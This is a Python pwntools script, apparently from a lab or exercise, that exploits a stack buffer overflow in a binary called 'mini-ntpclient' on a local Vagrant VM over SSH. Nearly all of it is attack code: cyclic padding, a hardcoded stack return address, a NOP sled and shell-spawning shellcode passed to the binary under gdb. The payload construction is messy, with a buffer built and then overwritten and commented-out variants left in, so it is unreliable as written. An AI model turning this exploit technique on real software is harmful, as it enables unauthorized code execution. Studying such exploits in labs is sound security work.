46 lines
1.0 KiB
Python
46 lines
1.0 KiB
Python
|
from pwn import *
|
||
|
import base64
|
||
|
|
||
|
context.update(arch='i686', os='linux')
|
||
|
|
||
|
# Connect to the server with SSH
|
||
|
ssh_connection = ssh('vagrant', 'default', port=2222)
|
||
|
|
||
|
# Open a shell to write more stuff to
|
||
|
bash = ssh_connection.run('bash')
|
||
|
|
||
|
|
||
|
|
||
|
#crash_at = 0x107
|
||
|
crash_at = 264
|
||
|
#eip_crash = 0x61616663
|
||
|
eip_crash = 0x43424242
|
||
|
esp_location = pack(0xbffff600)
|
||
|
eip_crash_buffer = cyclic_find(eip_crash)
|
||
|
|
||
|
|
||
|
|
||
|
shellcode = shellcraft.sh()
|
||
|
nop_sled = asm('nop') * (crash_at - eip_crash_buffer - len(esp_location) - len(shellcode))
|
||
|
payload = b'A' * eip_crash_buffer + esp_location + nop_sled
|
||
|
|
||
|
|
||
|
payload = cyclic(300) + esp_location
|
||
|
|
||
|
print(shellcraft.sh())
|
||
|
#payload = cyclic(eip_crash_buffer)
|
||
|
payload += asm(shellcode)
|
||
|
|
||
|
a = str()
|
||
|
for i in payload:
|
||
|
a += "\\\\x%x" % i
|
||
|
|
||
|
bash.sendline('ulimit -c unlimited')
|
||
|
#bash.sendline('/vagrant/mini-ntpclient ' + payload.hex() )
|
||
|
bash.sendline('gdb /vagrant/mini-ntpclient ' )
|
||
|
bash.sendline('run ' + str(a))
|
||
|
#bash.sendline('run ' + str(cyclic(crash_at)))
|
||
|
|
||
|
# Hand an interactive shell back to the user
|
||
|
bash.interactive()
|